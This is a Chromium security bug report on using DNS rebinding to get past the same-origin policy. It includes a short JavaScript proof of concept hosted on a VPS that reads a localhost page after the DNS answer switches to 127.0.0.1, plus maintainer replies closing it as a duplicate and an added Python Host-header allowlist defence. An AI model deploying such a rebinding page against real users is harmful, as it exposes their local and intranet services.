Security: use dns rebind to bypass sop
Reported by njupt...@gmail.com, Jul 23 2017
Issue description

VERSION
Chrome Version: all
Operating System: all

REPRODUCTION CASE
DNS rebind can bypass SOP to send requests to, and get responses from, some websites which are visited using an IP.

For example, I start a web server on my PC:

    php -S 127.0.0.1:80

and then create a file by echoing 'here is 127.0.0.1' into index.html.

Then I write a PoC file such as:

    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.js"></script>
    <script>
    // Relative URL: the request goes to whatever IP the page's hostname resolves to now.
    function bypass(){
        $.get('/index.html', function(data){ alert(data); });
    }
    // Wait 65 s so the cached DNS answer has expired before the request is made.
    setTimeout("bypass();", 65000);
    </script>

and deploy the file on my VPS: http://45.78.17.254/rebind.html

After that I can use DNS rebind to bypass SOP. rebind.py will be attached to the report. The first DNS answer was 45.78.17.254 with TTL=0, and later queries will return 127.0.0.1 (DNS rebind). Chrome's DNS cache is maybe 60s? So I can use setTimeout to load a resource from the other domain.

I attach the file rebind.py; you may search to find out how to use it. I'm so weak in English....

Some articles:
http://www.bendawang.site/article/%E5%85%B3%E4%BA%8EDNS-rebinding%E7%9A%84%E6%80%BB%E7%BB%93
https://ricterz.me/posts/Use%20DNS%20Rebinding%20to%20Bypass%20IP%20Restriction
https://en.wikipedia.org/wiki/DNS_rebinding

Jul 23 2017
I see a .py script attached, but this bug tracker is for vulnerabilities in Chrome. Do you have an example of HTML/JavaScript that will cause a remote attack without running any other code on the user's machine?

Jul 30 2017
I believe this is a duplicate of Issue 167723, Issue 438085, etc. DNS rebinding is a longstanding, largely unresolved issue in web clients. Fortunately, it fails in the face of HTTPS certificate validation, which is becoming prevalent.

Jul 31 2017
Thanks for reporting the issue. It does seem too similar to issue 438085, though. Please feel free to re-open the bug if there's any difference and highlight it. Thanks.

Nov 6 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
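
Added defensive example, not part of the original report or of Chrome: in the reproduction case above the rebound request still carries the attacker page's hostname in its Host header, so a service bound to 127.0.0.1 can refuse it by allowlisting the names it expects to be reached under. The handler, port 8080 and the hostname `rebind.attacker.example` used in the comments are assumptions for illustration.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumption: the local service is only ever meant to be reached under these names.
ALLOWED_HOSTS = {"127.0.0.1", "localhost", "[::1]"}


def normalize_host(host_header):
    """Return the lowercased host without its port, or None if malformed."""
    if not host_header:
        return None
    host = host_header.strip().lower()
    if host.startswith("["):  # bracketed IPv6 literal, e.g. [::1]:80
        end = host.find("]")
        if end == -1:
            return None
        rest = host[end + 1:]
        if rest and not (rest.startswith(":") and rest[1:].isdigit()):
            return None
        return host[:end + 1]
    name, sep, port = host.partition(":")
    if sep and not port.isdigit():
        return None
    return name.rstrip(".") or None  # tolerate a trailing root dot


def host_allowed(host_header, allowed=ALLOWED_HOSTS):
    return normalize_host(host_header) in allowed


class RebindSafeHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # After rebinding, the browser connects to 127.0.0.1 but still sends
        # "Host: rebind.attacker.example" (constructed name), so it is refused.
        if not host_allowed(self.headers.get("Host")):
            self.send_error(403, "Host not allowed")
            return
        body = b"here is 127.0.0.1\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Port 8080 is an assumption; the report's server listened on port 80.
    HTTPServer(("127.0.0.1", 8080), RebindSafeHandler).serve_forever()
```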